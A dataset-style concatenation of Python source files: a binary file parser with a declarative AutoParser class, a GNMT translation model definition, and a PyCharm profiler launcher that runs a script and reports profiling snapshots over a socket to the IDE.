self.byte_order = ">"
elif b == "little":
self.byte_order = "<"
elif b == "swap":
# swap what ever the current byte order is
if struct.pack("H", 1).startswith("\x00"):
self.byte_order = "<"
else:
self.byte_order = ">"
elif b == "native":
self.byte_order = "="
elif b == "<" or b == ">" or b == "@" or b == "=":
self.byte_order = b
else:
print("Invalid byte order specified: '%s'" % (b))
def seek(self, offset, whence=SEEK_SET):
if self.file:
return self.file.seek(offset, whence)
raise ValueError
def tell(self):
if self.file:
return self.file.tell()
raise ValueError
def read_data(self, byte_size):
bytes = self.read_size(byte_size)
if len(bytes) == byte_size:
return FileExtract(
                BytesIO(bytes), self.byte_order, self.addr_size
)
return None
def read_size(self, byte_size):
s = self.file.read(byte_size)
if len(s) != byte_size:
return None
return s
def push_offset_and_seek(self, offset, whence=SEEK_SET):
'''Push the current file offset and seek to "offset"'''
self.offsets.append(self.file.tell())
self.file.seek(offset, whence)
def pop_offset_and_seek(self):
"""Pop a previously pushed file offset and set the file position."""
if len(self.offsets) > 0:
self.file.seek(self.offsets.pop(), SEEK_SET)
def get_sint8(self, fail_value=0):
"""Extract a int8_t from the current file position."""
s = self.read_size(1)
return self._unpack("b", s) if s else fail_value
def get_uint8(self, fail_value=0):
"""Extract and return a uint8_t from the current file position."""
s = self.read_size(1)
return self._unpack("B", s) if s else fail_value
def get_sint16(self, fail_value=0):
"""Extract a int16_t from the current file position."""
s = self.read_size(2)
return self._unpack("h", s) if s else fail_value
def get_uint16(self, fail_value=0):
"""Extract a uint16_t from the current file position."""
s = self.read_size(2)
return self._unpack("H", s) if s else fail_value
def get_sint32(self, fail_value=0):
"""Extract a int32_t from the current file position."""
s = self.read_size(4)
return self._unpack("i", s) if s else fail_value
def get_uint32(self, fail_value=0):
"""Extract a uint32_t from the current file position."""
s = self.read_size(4)
return self._unpack("I", s) if s else fail_value
def get_sint64(self, fail_value=0):
"""Extract a int64_t from the current file position."""
s = self.read_size(8)
return self._unpack("q", s) if s else fail_value
def get_uint64(self, fail_value=0):
"""Extract a uint64_t from the current file position."""
s = self.read_size(8)
return self._unpack("Q", s) if s else fail_value
def _unpack(self, format_suffix, s):
return struct.unpack(self.byte_order + format_suffix, s)[0]
def get_address(self, fail_value=0):
if self.addr_size == 0:
print("error: invalid addr size...")
raise ValueError
else:
return self.get_uint_size(self.addr_size, fail_value)
def get_sint_size(self, size, fail_value=0):
"""Extract a signed integer from the current file position whose
size is "size" bytes long."""
if size == 1:
return self.get_sint8(fail_value)
if size == 2:
return self.get_sint16(fail_value)
if size == 4:
return self.get_sint32(fail_value)
if size == 8:
return self.get_sint64(fail_value)
print("error: integer of size %u is not supported" % (size))
return fail_value
def get_uint_size(self, size, fail_value=0):
"""Extract a unsigned integer from the current file position whose
size is "size" bytes long."""
if size == 1:
return self.get_uint8(fail_value)
if size == 2:
return self.get_uint16(fail_value)
if size == 4:
return self.get_uint32(fail_value)
if size == 8:
return self.get_uint64(fail_value)
print("error: integer of size %u is not supported" % (size))
return fail_value
def get_fixed_length_c_string(
self, n, fail_value="", isprint_only_with_space_padding=False
):
"""Extract a fixed length C string from the current file position."""
s = self.read_size(n)
if s:
(cstr,) = struct.unpack(self.byte_order + ("%i" % n) + "s", s)
            # Strip trailing NULLs
cstr = cstr.strip(b"\0")
if isprint_only_with_space_padding:
for c in cstr:
                    if chr(c) in string.printable or c == 0:
continue
return fail_value
return cstr
else:
return fail_value
def get_c_string(self):
"""Extract a NULL terminated C string from the current position."""
cstr = ""
byte = self.get_uint8()
while byte != 0:
cstr += "%c" % byte
byte = self.get_uint8()
return cstr
def get_n_sint8(self, n, fail_value=0):
"""Extract "n" int8_t values from the current position as a list."""
s = self.read_size(n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "b", s)
else:
return (fail_value,) * n
def get_n_uint8(self, n, fail_value=0):
"""Extract "n" uint8_t values from the current position as a list."""
s = self.read_size(n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "B", s)
else:
return (fail_value,) * n
def get_n_sint16(self, n, fail_value=0):
"""Extract "n" int16_t values from the current position as a list."""
s = self.read_size(2 * n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "h", s)
else:
return (fail_value,) * n
def get_n_uint16(self, n, fail_value=0):
"""Extract "n" uint16_t values from the current position as a list."""
s = self.read_size(2 * n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "H", s)
else:
return (fail_value,) * n
def get_n_sint32(self, n, fail_value=0):
"""Extract "n" int32_t values from the current position as a list."""
s = self.read_size(4 * n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "i", s)
else:
return (fail_value,) * n
def get_n_uint32(self, n, fail_value=0):
"""Extract "n" uint32_t values from the current position as a list."""
s = self.read_size(4 * n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "I", s)
else:
return (fail_value,) * n
def get_n_sint64(self, n, fail_value=0):
"""Extract "n" int64_t values from the current position as a list."""
s = self.read_size(8 * n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "q", s)
else:
return (fail_value,) * n
def get_n_uint64(self, n, fail_value=0):
"""Extract "n" uint64_t values from the current position as a list."""
s = self.read_size(8 * n)
if s:
return struct.unpack(self.byte_order + ("%u" % n) + "Q", s)
else:
return (fail_value,) * n
def get_uleb128p1(self, fail_value=0):
return self.get_uleb128(fail_value) - 1
def get_uleb128(self, fail_value=0):
"""Extract a ULEB128 number"""
byte = self.get_uint8()
# Quick test for single byte ULEB
if byte & 0x80:
result = byte & 0x7F
shift = 7
while byte & 0x80:
byte = self.get_uint8()
result |= (byte & 0x7F) << shift
shift += 7
return result
else:
return byte # Simple one byte ULEB128 value...
def get_sleb128(self, fail_value=0):
result = 0
shift = 0
size = 64
byte = 0
bytecount = 0
while 1:
bytecount += 1
byte = self.get_uint8()
result |= (byte & 0x7F) << shift
shift += 7
if (byte & 0x80) == 0:
break
# Sign bit of byte is 2nd high order bit (0x40)
if shift < size and (byte & 0x40):
result |= -(1 << shift)
return result
def dump(self, start=0, end=-1):
if end == -1:
            self.seek(0, SEEK_END)  # Seek to end to get the total file size
n = self.tell() - start
else:
n = end - start
self.seek(start, SEEK_SET)
bytes = self.read_size(n)
dump_memory(0, bytes, 32, sys.stdout)
def main():
uleb_tests = [
(struct.pack("B", 0x02), 2),
(struct.pack("B", 0x7F), 127),
(struct.pack("2B", 0x80, 0x01), 128),
(struct.pack("2B", 0x81, 0x01), 129),
(struct.pack("2B", 0x82, 0x01), 130),
(struct.pack("2B", 0xB9, 0x64), 12857),
]
sleb_tests = [
(struct.pack("B", 0x02), 2),
(struct.pack("B", 0x7E), -2),
(struct.pack("2B", 0xFF, 0x00), 127),
(struct.pack("2B", 0x81, 0x7F), -127),
(struct.pack("2B", 0x80, 0x01), 128),
(struct.pack("2B", 0x80, 0x7F), -128),
(struct.pack("2B", 0x81, 0x01), 129),
(struct.pack("2B", 0xFF, 0x7E), -129),
]
num_errors = 0
print("Running unit tests...", end="")
for (s, check_n) in sleb_tests:
e = FileExtract(BytesIO(s))
n = e.get_sleb128()
if n != check_n:
num_errors += 1
print("\nerror: sleb128 extraction failed for %i (got %i)" % (check_n, n))
dump_memory(0, s, 32, sys.stdout)
for (s, check_n) in uleb_tests:
e = FileExtract(BytesIO(s))
n = e.get_uleb128()
if n != check_n:
num_errors += 1
print("\nerror: uleb128 extraction failed for %i (got %i)" % (check_n, n))
dump_memory(0, s, 32, sys.stdout)
if num_errors == 0:
print("ok")
else:
print("%u errors" % (num_errors))
print
if __name__ == "__main__":
main()
class AutoParser:
"""A class that enables easy parsing of binary files.
    This class is designed to be subclassed and clients must provide a list of
items in the constructor. Each item in the items list is a dictionary that
describes each attribute that should be added to the class when it is
decoded. A quick example for a C structure:
struct load_command {
uint32_t cmd; /* type of load command */
uint32_t cmdsize; /* total size of command in bytes */
};
The python code would look like:
class load_command(file_extract.AutoParser):
items = [
{ 'name':'cmd', 'type':'u32' },
{ 'name':'cmdsize', 'type':'u32'},
]
def __init__(self, data):
AutoParser.__init__(self, self.items, data)
Decoding a single load_command from a file involves opening a file and
creating a FileExtract object, and then decoding the load_command object:
file = open(path)
data = file_extract.FileExtract(file, '=', 4)
lc = load_command(data)
The 'lc' object now has two properties:
lc.cmd
lc.cmdsize
    Item dictionaries are very easy to define and have quite a few options
to ensure it is very easy to parse a binary file by defining many
subclasses of file_extract.AutoParser and combining them together.
Item dictionaries can contain the following keys:
KEY NAME DESCRIPTION
============== ============================================================
'name' A string name of the attribute to add to this class when
decoding. If an item has no name, it will not be added to
this object when it is being decoded. Omitting the name is
handy when you have padding where you might need to decode
some bytes that are part of the on disk representation of
the binary object, but don't need the value represented
in the object itself.
'type' A string name for the type of the data to decode. See
"Builin Types" table below for valid typename values. Either
    'class'         An AutoParser subclass that will be used to decode
this item by constructing it with the data at the current
offset. This allows you to compose a AutoParser object
that is contained within another AutoParser object.
'condition' A function that takes two arguments: the current AutoParser
object that is in the process of being decoded and the
FileExtract object. The function returns True if this item
is present and should be decoded, and False if it should be
skipped. The condition is evaluated before the value is
decoded and stops the type/class/decode from decoding the
object. This can be used to only decode a value if a
previous attribute is a specific value. If a 'default' key
is present in the item dictionary, then the 'default' value
                    will be set as the value for this item, otherwise the
attribute will not be added to this object:
condition_passed = item['condition'](AutoParser,
FileExtract)
'default' The default value for the current item that will be set if
the 'condition' callback function returns False.
'decode' A function that take a single file_extract.FileExtract
object argument and returns the value for this item.
value = item['decode'](FileExtract)
'align' An integer that gives the file offset alignment for this
item. This alignment can be any number and the file
position will be advanced to the next aligned offset if
needed prior to reading the value
'attr_count' A string that specifies the name of an attribute that has
already been decoded in this object. This indicates that the
value for this item is a list whose size is the integer
value of the attribute that was already decoded in a
previous item in this object.
'attr_offset' An integer that this item's value is contained within the
file at the specified offset. A seek will be performed on
the file before reading the value of this object. The file
position will be pushed onto a stack, a seek will be
performed, the item's value will be read, and then the file
position will be restored.
'attr_offset_size' A string name of an existing attribute that contains
the end offset of the data for this object. This is useful
when a list of items is contained in the file and the count
of the items is not specified, just the end offset. This is
often used with the 'attr_offset' key/value pair. The
type/class/decode will be continually called until the file
offset exceeds the offset + 'attr_offset_size'. String
tables are good example of when this is used as they string
table offset and size are often specified, but no the
number of strings in the string table.
'attr_offset_whence' A string name that specifies the type of seek to
perform on the 'attr_offset' value. This can be one of
"item", "file", "eof", "curr". "item" specifies the offset
is relative to the starting offset of this object. "file"
specifies that the offset is relative to the start of the
file. "eof" specifies that the offset is relative to the
                    end of the file. "curr" specifies that the offset is relative
to the current file position.
'validate' A function pointer that will be called after the value has
been extracted. The function is called with the extracted
value and should return None if the value is valid, or
return an error string if the value is not valid:
error = item['validate'](value)
if error:
raise ValueError(error)
'value_fixup' A function pointer that will be called after the item's
value has been decoded. The function will be called with one
argument, the decoded value, and returns the fixed value:
value = item['value_fixup'](value)
'debug' A string value that is printed prior to decoding the item's
value. The printed string value is prefixed by the current
file offset and allows debugging of where a value is being
decoded within the file. This helps debug the decoding of
items.
'switch' The string name of an attribute that was already decoded in
this object. The attribute value will be used as a key into
the 'cases' item key/value pair in the items supplied to the
AutoParser object. If the attribute value is not found in
the 'cases' dictionary, then 'default' will be used as the
key into the 'cases' dictionary. See 'cases' below. See
"Switch Example" below for more information.
'cases' A dictionary of values to items arrays. The 'switch' key
above specifies the name of an attribute in this object that
will be used as the key into the dictionary specified in
this key/value pair. The items that are found during the
lookup will then be decoded into this object. See
"Switch Example" below for more information.
'dump' A function pointer that is called to dump the value. The
function gets called with the value and the file:
def dump(value, file):
...
'dump_list' A function pointer that is called to dump a list of values.
The function gets called with the value and the file:
def dump_list(value, prefix, flat, file):
...
EXAMPLE 1
If you have a structure that has a count followed by an array of items
whose size is the value of count:
struct NumberArray {
uint32_t count;
uint32_t numbers[];
};
This would be respresented by the following items:
class NumberArray(AutoParser):
items = [
{'type':'u32', 'name':'count'},
{'type':'u32', 'name':'numbers', 'attr_count' : 'count'},
]
def __init__(self, data):
AutoParser.__init__(self, self.items, data)
The second item named 'numbers' will be decoded as a list of 'obj.count'
u32 values as the 'attr_count' specifies the name of an attribute that
has already been decoded into the object 'obj' and contains the count.
EXAMPLE 2
Sometimes a structure contains an offset and a count of objects. In the
example below SymtabInfo contains the offset and count of Symbol objects
that appear later in the file:
struct SymtabInfo {
uint32_t symtab_offset;
uint32_t num_symbols;
}
struct Symbol {
...;
};
The symbol table can be decoded by combinging the two things together
into the same object when decoding:
class Symbol(AutoParser):
...
class SymtabInfo(AutoParser):
items = [
{'type' : 'u32', 'name' : 'symtab_offset'},
{'type' : 'u32', 'name' : 'num_symbols' },
{'class' : Symbol,
'name' : 'symbols',
'attr_offset' : 'symtab_offset',
'attr_count' : 'num_symbols' }
]
def __init__(self, data):
AutoParser.__init__(self, self.items, data)
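    SWITCH EXAMPLE
    (Added illustration; the field name 'kind' and the payload layouts below
    are made up.) The 'switch'/'cases' keys described above select which
    sub-items to decode based on an attribute decoded earlier in the object:
        class Value(AutoParser):
            items = [
                {'type': 'u8', 'name': 'kind'},
                {'switch': 'kind',
                 'cases': {0: [{'type': 'u32', 'name': 'value'}],
                           1: [{'type': 'cstr', 'name': 'value'}],
                           'default': [{'type': 'u8', 'name': 'value'}]}},
            ]
            def __init__(self, data):
                AutoParser.__init__(self, self.items, data)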
"""
type_regex = re.compile(r"([^\[]+)\[([0-9]+)\]")
default_formats = {
"u8": "%#2.2x",
"u16": "%#4.4x",
"u32": "%#8.8x",
"u64": "%#16.16x",
"addr": "%#16.16x",
"cstr": '"%s"',
}
read_value_callbacks = {
"u8": lambda data: data.get_uint8(),
"u16": lambda data: data.get_uint16(),
"u32": lambda data: data.get_uint32(),
"u64": lambda data: data.get_uint64(),
"s8": lambda data: data.get_sint8(),
"s16": lambda data: data.get_sint16(),
"s32": lambda data: data.get_sint32(),
"s64": lambda data: data.get_sint64(),
"addr": lambda data: data.get_address(),
"uleb": lambda data: data.get_uleb128(),
"sleb": lambda data: data.get_sleb128(),
"ulebp1": lambda data: data.get_uleb128p1(),
}
def __init__(self, items, data, context=None):
self.__offset = data.tell()
self.items = items
self.context = context # Any object you want to store for future usage
self.max_name_len = 0
self.extract_items(items, data)
self.__len = data.tell() - self.__offset
def __len__(self):
return self.__len
def get_list_header_lines(self):
"""When an object of this type is in a list, print out this string
before printing out any items"""
return None
def get_dump_header(self):
"""Override in subclasses to print this string out before any items
are dumped. This is a good place to put a description of the item
represented by this class and possible to print out a table header
in case the items are a list"""
return None
def get_dump_prefix(self):
"""Override in subclasses to print out a string before each item in
this class"""
return None
def get_dump_flat(self):
return False
def get_offset(self):
return self.__offset
def extract_items(self, items, data):
for item in items:
offset_pushed = False
if "attr_offset" in item:
offset = getattr(self, item["attr_offset"])
if "attr_offset_whence" in item:
offset_base = item["attr_offset_whence"]
if offset_base == "item":
# Offset from the start of this item
data.push_offset_and_seek(offset + self.get_offset())
offset_pushed = True
elif offset_base == "file":
# Offset from the start of the file
data.push_offset_and_seek(offset, SEEK_SET)
offset_pushed = True
elif offset_base == "eof":
# Offset from the end of the file
data.push_offset_and_seek(offset, SEEK_END)
offset_pushed = True
elif offset_base == "curr":
# Offset from the current file position
data.push_offset_and_seek(offset, SEEK_CUR)
offset_pushed = True
else:
raise ValueError(
'"attr_offset_whence" can be one of "item", '
'"file", "eof", "curr" (defaults to "file")'
)
else:
# Default to offset from the start of the file
data.push_offset_and_seek(offset, SEEK_SET)
offset_pushed = True
if "debug" in item:
print("%#8.8x: %s" % (self.__offset, item["debug"]))
continue
if "switch" in item:
if "cases" not in item:
raise ValueError(
'items with a "switch" key/value pair, '
'must have a "cases" key/value pair'
)
cases = item["cases"]
switch_value = getattr(self, item["switch"])
if switch_value in cases:
case_items = cases[switch_value]
elif "default" in cases:
case_items = cases["default"]
else:
raise ValueError("unhandled switch value %s" % (str(switch_value)))
self.extract_items(case_items, data)
continue
# Check if this item is just an alignment directive?
condition_passed = True
if "condition" in item:
condition_passed = item["condition"](self, data)
if "align" in item:
if condition_passed:
data.align_to(item["align"])
count = self.read_count_from_item(item)
value_fixup = None
# If there is a value fixup key, then call the function with the
# data and the value. The return value will be a fixed up value
# and the function also has the ability to modify the data stream
# (set the byte order, address byte size, etc).
if "value_fixup" in item:
value_fixup = item["value_fixup"]
if "attr_offset_size" in item:
# the number of items is inferred by parsing up until
# attr_offset + attr_offset_size, so we create a new
# FileExtract object that only contains the data we need and
# extract using that data.
attr_offset_size = getattr(self, item["attr_offset_size"])
item_data = data.read_data(attr_offset_size)
if item_data is None:
raise ValueError("failed to get item data")
value = self.decode_value(
item_data, item, condition_passed, value_fixup
)
else:
if count is None:
value = self.decode_value(data, item, condition_passed, value_fixup)
else:
value = []
for _ in range(count):
value.append(
self.decode_value(data, item, condition_passed, value_fixup)
)
if "validate" in item:
error = item["validate"](value)
if error is not None:
raise ValueError("error: %s" % (error))
if "name" in item and value is not None:
name = item["name"]
setattr(self, name, value)
name_len = len(name)
if self.max_name_len < name_len:
self.max_name_len = name_len
if offset_pushed:
data.pop_offset_and_seek()
def decode_value(self, data, item, condition_passed, value_fixup):
# If the item has a 'condition' key, then this is a function
# that we pass "self" to in order to determine if this value
# is available. If the callback returns False, then we set the
# value to the default value
read_value = True
if not condition_passed:
if "default" in item:
v = item["default"]
else:
v = None
read_value = False
if read_value:
if "type" in item:
v = self.read_type(data, item)
elif "class" in item:
v = item["class"](data)
elif "decode" in item:
v = item["decode"](data)
else:
raise ValueError(
'item definitions must have a "type" or '
'"class" or "decode" field'
)
# Let the item fixup each value if needed and possibly
# adjust the byte size or byte order.
if value_fixup is not None:
v = value_fixup(data, v)
return v
def dump_item(self, prefix, f, item, print_name, parent_path, flat):
if "switch" in item:
cases = item["cases"]
switch_value = getattr(self, item["switch"])
if switch_value in cases:
case_items = cases[switch_value]
elif "default" in cases:
case_items = cases["default"]
for case_item in case_items:
self.dump_item(prefix, f, case_item, print_name, parent_path, flat)
return
# We skip printing an item if any of the following are true:
# - If there is no name (padding)
# - If there is a 'dump' value key/value pair with False as the value
if "name" not in item or "dump" in item and item["dump"] is False:
return
name = item["name"]
if not hasattr(self, name):
return
value = getattr(self, name)
value_is_list = type(value) is list
# If flat is None set its value automatically
if flat is None:
flat = self.get_dump_flat()
if value_is_list:
if "table_header" in item:
table_header = item["table_header"]
f.write(table_header)
if not last_char_is_newline(table_header):
f.write("\n")
print_name = False
flat = True
if prefix is None:
prefix = self.get_dump_prefix()
flat_list = value_is_list and "flat" in item and item["flat"]
if prefix and flat_list is False:
f.write(prefix)
if print_name:
if not flat_list:
if flat:
f.write(name)
f.write("=")
else:
f.write("%-*s" % (self.max_name_len, name))
f.write(" = ")
if "dump" in item:
item["dump"](value, f)
return
elif "dump_list" in item:
item["dump_list"](value, prefix, flat, f)
return
else:
if value_is_list:
if parent_path is None:
item_path = name
else:
item_path = parent_path + "." + name
self.dump_values(f, item, value, print_name, item_path, prefix)
else:
if "dump_width" in item:
dump_width = item["dump_width"]
strm = StringIO()
self.dump_value(strm, item, value, print_name, parent_path)
s = strm.getvalue()
f.write(s)
s_len = len(s)
if s_len < dump_width:
f.write(" " * (dump_width - s_len))
else:
self.dump_value(f, item, value, print_name, parent_path)
if not flat_list:
if flat:
f.write(" ")
else:
f.write("\n")
def dump_value(self, f, item, value, print_name, parent_path):
if value is None:
f.write("<NULL>")
return
if "stringify" in item:
f.write("%s" % item["stringify"](value))
return
if "type" in item:
itemtype = item["type"]
if "format" in item:
format = item["format"]
elif itemtype in self.default_formats:
format = self.default_formats[itemtype]
else:
format = None
if format:
f.write(format % (value))
else:
if itemtype.startswith("cstr"):
f.write('"')
f.write(hex_escape(value))
f.write('"')
else:
f.write(str(value))
elif "class" in item:
value.dump(prefix=None, print_name=print_name, f=f, parent_path=parent_path)
else:
raise ValueError(
"item's with names must have a 'type' or " "'class' key/value pair"
)
def dump_values(self, f, item, values, print_name, parent_path, prefix):
if len(values) == 0:
if "flat" in item and item["flat"]:
if prefix:
f.write(prefix)
if parent_path:
f.write(parent_path)
f.write("[]\n")
return
flat = self.get_dump_flat()
if flat is False and "flat" in item:
flat = item["flat"]
count = len(values)
if count > 0:
index_width = 1
w = count
while w > 10:
index_width += 1
w /= 10
if isinstance(values[0], AutoParser):
first = values[0]
table_header_lines = first.get_list_header_lines()
if table_header_lines:
f.write("\n")
print_name = False
flat = True
for line in table_header_lines:
f.write(" " * (index_width + 3))
f.write(line)
index_format = "[%%%uu]" % (index_width)
if prefix is None:
prefix = ""
for (i, value) in enumerate(values):
if flat:
if prefix:
f.write(prefix)
if parent_path:
f.write(parent_path)
f.write(index_format % (i))
f.write(" = ")
else:
format = "\n%s%s" + index_format + "\n"
f.write(format % (prefix, parent_path, i))
self.dump_value(f, item, value, print_name, parent_path)
f.write("\n")
def dump(
self, prefix=None, f=sys.stdout, print_name=True, parent_path=None, flat=None
):
header = self.get_dump_header()
if header:
f.write(header)
if not last_char_is_newline(header):
f.write("\n")
for item in self.items:
self.dump_item(prefix, f, item, print_name, parent_path, flat)
def read_count_from_item(self, item):
if "attr_count" in item:
# If 'attr_count' is in the dictionary. If so, it means that
# there is already an attribute in this object that has the
# count in it and we should ready that many of the type
count = getattr(self, item["attr_count"])
# If there is an 'attr_count_fixup' key, it is a function that
# will fixup the count value
if "attr_count_fixup" in item:
count = item["attr_count_fixup"](count)
return count
elif "count" in item:
return item["count"]
return None
def read_builtin_type(self, data, typename, item):
if typename in self.read_value_callbacks:
return self.read_value_callbacks[typename](data)
if typename == "cstr":
count = self.read_count_from_item(item)
if count is None:
return data.get_c_string()
else:
return data.get_fixed_length_c_string(count)
if typename == "bytes":
if "attr_size" in item:
size = getattr(self, item["attr_size"])
return data.read_size(size)
else:
raise ValueError(
"'bytes' must have either a 'count' or a "
"'attr_count' key/value pair"
)
raise ValueError("invalid 'type' value %s" % (typename))
def read_type(self, data, item):
typename = item["type"]
if "[" in typename:
match = self.type_regex.match(typename)
if not match:
raise ValueError(
"item type array must be a valid type "
"followed by [] with a decimal number "
"as the size"
)
basetype = match.group(1)
count = int(match.group(2))
if basetype == "cstr":
return data.get_fixed_length_c_string(count)
result = []
for _ in range(count):
result.append(self.read_builtin_type(data, basetype, item))
return result
else:
return self.read_builtin_type(data, typename, item)
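# --- Illustrative sketch (added commentary; the field names below are made up) ---
# The dump/read machinery above is driven per field by an "item" dictionary.
# Assuming the read_value_callbacks table provides the usual fixed-width integer
# type names, a spec for a small header could look like:
#
#     items = [
#         {"name": "magic",   "type": "uint32", "format": "%#8.8x"},
#         {"name": "version", "type": "uint16"},
#         {"name": "name",    "type": "cstr", "count": 16},                 # fixed-length C string
#         {"name": "payload", "type": "bytes", "attr_size": "payload_size"},
#     ]
#
# read_type() consumes one value per item (array specs such as "uint32[4]" yield
# lists), and dump_item()/dump_value() render each value using the optional
# 'format', 'dump_width', 'flat' and 'table_header' keys.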
| [
"[email protected]"
] | |
63f26a8db8b11444b2c37dda05f8b04c536308c0 | 5fe709d0643394168dd919bbc721adabebe60a97 | /profiler/translation/seq2seq/models/gnmt.py | b3bc9147c44775f20a46b6cbce1d24d4ee9b4917 | [
"MIT"
] | permissive | vibhatha/pipedream | 8232b67366a0dd84e41fd496c9b2e8b86dbfdd89 | af6b811f5d01a68e9eb91065e5242fc1a075f279 | refs/heads/master | 2020-12-20T18:21:35.337352 | 2020-07-06T04:54:23 | 2020-07-06T04:54:23 | 236,167,878 | 0 | 0 | MIT | 2020-01-25T12:34:04 | 2020-01-25T12:34:03 | null | UTF-8 | Python | false | false | 2,830 | py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import torch.nn as nn
from mlperf_compliance import mlperf_log
from seq2seq.utils import gnmt_print
import seq2seq.data.config as config
from seq2seq.models.seq2seq_base import Seq2Seq
from seq2seq.models.encoder import ResidualRecurrentEncoder
from seq2seq.models.decoder import ResidualRecurrentDecoder
import torchmodules.torchgraph as torchgraph
class GNMT(Seq2Seq):
"""
GNMT v2 model
"""
def __init__(self, vocab_size, hidden_size=512, num_layers=8, bias=True,
dropout=0.2, batch_first=False, math='fp32',
share_embedding=False):
"""
Constructor for the GNMT v2 model.
:param vocab_size: size of vocabulary (number of tokens)
:param hidden_size: internal hidden size of the model
:param num_layers: number of layers, applies to both encoder and
decoder
:param bias: globally enables or disables bias in encoder and decoder
:param dropout: probability of dropout (in encoder and decoder)
:param batch_first: if True the model uses (batch,seq,feature) tensors,
if false the model uses (seq, batch, feature)
:param math: arithmetic type, 'fp32' or 'fp16'
:param share_embedding: if True embeddings are shared between encoder
and decoder
"""
super(GNMT, self).__init__(batch_first=batch_first)
gnmt_print(key=mlperf_log.MODEL_HP_NUM_LAYERS,
value=num_layers)
gnmt_print(key=mlperf_log.MODEL_HP_HIDDEN_SIZE,
value=hidden_size)
gnmt_print(key=mlperf_log.MODEL_HP_DROPOUT,
value=dropout)
if share_embedding:
embedder = nn.Embedding(vocab_size, hidden_size, padding_idx=config.PAD)
else:
embedder = None
self.encoder = ResidualRecurrentEncoder(vocab_size, hidden_size,
num_layers, bias, dropout,
batch_first, embedder)
self.decoder = ResidualRecurrentDecoder(vocab_size, hidden_size,
num_layers, bias, dropout,
batch_first, math, embedder)
def forward(self, input_encoder, input_enc_len, input_decoder):
context = self.encode(input_encoder, input_enc_len)
hidden = None
if isinstance(context, torchgraph.TensorWrapper):
hidden = torchgraph.TensorWrapper(hidden, "hidden", context.graph_creator)
context = (context, input_enc_len, hidden)
output, _, _ = self.decode(input_decoder, context)
return output
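# --- Illustrative usage sketch (added commentary; sizes below are placeholders) ---
# Only the vocabulary size is required; the remaining arguments have defaults:
#
#     model = GNMT(vocab_size=32000, hidden_size=512, num_layers=4,
#                  share_embedding=True)
#     # input_encoder: (seq_len, batch) source token ids
#     # input_enc_len: (batch,) source sentence lengths
#     # input_decoder: (seq_len, batch) shifted target token ids
#     logits = model(input_encoder, input_enc_len, input_decoder)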
| [
"[email protected]"
] | |
b221ad4641f6d3b0f304e77820b72eeb21327c1a | f4bf81d4e80468331a09401dbaeef12465aca853 | /lib/python/helpers/profiler/run_profiler.py | d1054a5f28c84804105642bc0bdc2a81ea369adb | [] | no_license | nottyo/intellibot | 45c41d673608a0a1291c6387f9d33ef449f18837 | 0547d987deaad90260abe33db5284eae9704eb9b | refs/heads/master | 2020-12-30T23:59:29.795725 | 2017-04-10T07:53:59 | 2017-04-10T07:53:59 | 86,574,980 | 1 | 0 | null | 2017-03-29T11:37:54 | 2017-03-29T11:37:53 | null | UTF-8 | Python | false | false | 5,121 | py | import os
import sys
import time
import traceback
from socket import AF_INET
from socket import SOCK_STREAM
from socket import socket
from _prof_imports import ProfilerResponse
from prof_io import ProfWriter, ProfReader
from prof_util import generate_snapshot_filepath, stats_to_response, get_snapshot_basepath, save_main_module, execfile
base_snapshot_path = os.getenv('PYCHARM_SNAPSHOT_PATH')
remote_run = bool(os.getenv('PYCHARM_REMOTE_RUN', ''))
def StartClient(host, port):
""" connects to a host/port """
s = socket(AF_INET, SOCK_STREAM)
MAX_TRIES = 100
i = 0
while i < MAX_TRIES:
try:
s.connect((host, port))
except:
i += 1
time.sleep(0.2)
continue
return s
sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
sys.stderr.flush()
traceback.print_exc()
sys.exit(1) # TODO: is it safe?
class Profiler(object):
def __init__(self):
try:
import vmprof_profiler
self.profiling_backend = vmprof_profiler.VmProfProfile()
self.profiling_backend.basepath = get_snapshot_basepath(base_snapshot_path, remote_run)
print('Starting vmprof profiler\n')
except ImportError:
try:
import yappi_profiler
self.profiling_backend = yappi_profiler.YappiProfile()
print('Starting yappi profiler\n')
except ImportError:
import cProfile
self.profiling_backend = cProfile.Profile()
print('Starting cProfile profiler\n')
def connect(self, host, port):
s = StartClient(host, port)
self.initializeNetwork(s)
def initializeNetwork(self, sock):
try:
sock.settimeout(None) # infinite, no timeouts from now on - jython does not have it
except:
pass
self.writer = ProfWriter(sock)
self.reader = ProfReader(sock, self)
self.reader.start()
time.sleep(0.1) # give threads time to start
def process(self, message):
if hasattr(message, 'save_snapshot'):
self.save_snapshot(message.id, generate_snapshot_filepath(message.save_snapshot.filepath, remote_run, self.snapshot_extension()), remote_run)
else:
raise AssertionError("Unknown request %s" % dir(message))
def run(self, file):
m = save_main_module(file, 'run_profiler')
globals = m.__dict__
try:
globals['__builtins__'] = __builtins__
except NameError:
pass # Not there on Jython...
self.start_profiling()
try:
execfile(file, globals, globals) # execute the script
finally:
self.stop_profiling()
self.save_snapshot(0, generate_snapshot_filepath(base_snapshot_path, remote_run, self.snapshot_extension()), remote_run)
def start_profiling(self):
self.profiling_backend.enable()
def stop_profiling(self):
self.profiling_backend.disable()
def get_stats(self):
self.profiling_backend.create_stats()
return self.profiling_backend.stats
def has_tree_stats(self):
return hasattr(self.profiling_backend, 'tree_stats_to_response')
def tree_stats_to_response(self, filename, response):
return self.profiling_backend.tree_stats_to_response(filename, response)
def snapshot_extension(self):
if hasattr(self.profiling_backend, 'snapshot_extension'):
return self.profiling_backend.snapshot_extension()
return '.pstat'
def dump_snapshot(self, filename):
dir = os.path.dirname(filename)
if not os.path.exists(dir):
os.makedirs(dir)
self.profiling_backend.dump_stats(filename)
return filename
def save_snapshot(self, id, filename, send_stat=False):
self.stop_profiling()
if filename is not None:
filename = self.dump_snapshot(filename)
print('Snapshot saved to %s' % filename)
if not send_stat:
response = ProfilerResponse(id=id, snapshot_filepath=filename)
else:
response = ProfilerResponse(id=id)
stats_to_response(self.get_stats(), response)
if self.has_tree_stats():
self.tree_stats_to_response(filename, response)
self.writer.addCommand(response)
self.start_profiling()
if __name__ == '__main__':
host = sys.argv[1]
port = int(sys.argv[2])
file = sys.argv[3]
del sys.argv[0]
del sys.argv[0]
del sys.argv[0]
